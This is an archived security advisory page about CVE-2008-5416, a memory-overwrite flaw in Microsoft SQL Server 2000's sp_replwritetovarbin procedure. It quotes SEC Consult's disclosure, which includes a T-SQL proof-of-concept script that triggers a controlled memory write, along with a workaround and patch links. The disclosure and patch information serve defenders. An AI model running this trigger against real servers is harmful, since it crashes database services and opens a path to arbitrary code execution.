SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Microsoft SQL Server Vendors:   Microsoft
Microsoft SQL Server Memory Overwrite Bug in sp_replwritetovarbin May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1021363
SecurityTracker URL:  http://securitytracker.com/id/1021363
CVE Reference:   CVE-2008-5416   (Links to External Site)
Updated:  Feb 10 2009
Original Entry Date:  Dec 9 2008
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2000; 8.00.2039 and prior versions
Description:   A vulnerability was reported in Microsoft SQL Server. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can supply specially crafted parameters to the sp_replwritetovarbin extended stored procedure to overwrite memory and potentially execute arbitrary code on the target system. The code will run with the privileges of the target SQL service.

The vendor was notified on April 17, 2008.

Bernhard Mueller of SEC Consult Vulnerability Lab reported this vulnerability.

The original advisory is available at:

http://www.sec-consult.com/files/20081209_mssql-000-sp_replwritetovarbin_memwrite.txt

Impact:   A remote authenticated user can execute arbitrary code on the target system with the privileges of the target SQL service.
Solution:   The vendor has issued a fix.

The available GDR and QFE software updates are listed in the vendor's advisory.

The vendor has also issued the following fixes for Windows components:

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2, Microsoft SQL Server 2000 Desktop Engine (WMSDE):

http://www.microsoft.com/downloads/details.aspx?familyid=218809d6-a9fb-408b-a34d-ab2ac786994c

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2, Windows Internal Database (WYukon) Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=16925be5-98d0-446b-9bbc-d9a2d335c69e

Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2, Microsoft SQL Server 2000 Desktop Engine (WMSDE):

http://www.microsoft.com/downloads/details.aspx?familyid=87183155-6770-4ea2-acca-191de4d40d27

Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2, Windows Internal Database (WYukon) x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=05c5c265-cfd7-4364-b323-77650b7f1e67

Windows Server 2008 for 32-bit Systems*, Windows Internal Database (WYukon) Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=16925be5-98d0-446b-9bbc-d9a2d335c69e

Windows Server 2008 for x64-based Systems* , Windows Internal Database (WYukon) x64 Edition Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?familyid=05c5c265-cfd7-4364-b323-77650b7f1e67

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms09-004.mspx (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (2000), Windows (2003), Windows (2008)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] SEC Consult SA-20081109-0 :: Microsoft SQL Server

SEC Consult Security Advisory < 20081209-0 >
=====================================================================================
                  title: Microsoft SQL Server 2000 sp_replwritetovarbin
                         limited memory overwrite vulnerability
                program: Microsoft SQL Server 2000
     vulnerable version: <=8.00.2039
               homepage: www.microsoft.com
                  found: 04-12-2008
                     by: Bernhard Mueller (SEC Consult Vulnerability
Lab)
             perm. link:
http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
=====================================================================================

Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.


Vulnerabilty overview:
----------------------

By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.


Workaround:
-----------

Remove the sp_replwriterovarbin extended stored procedure. Run the
following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx


Patch:
------

According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.


Vendor timeline:
---------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4
and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC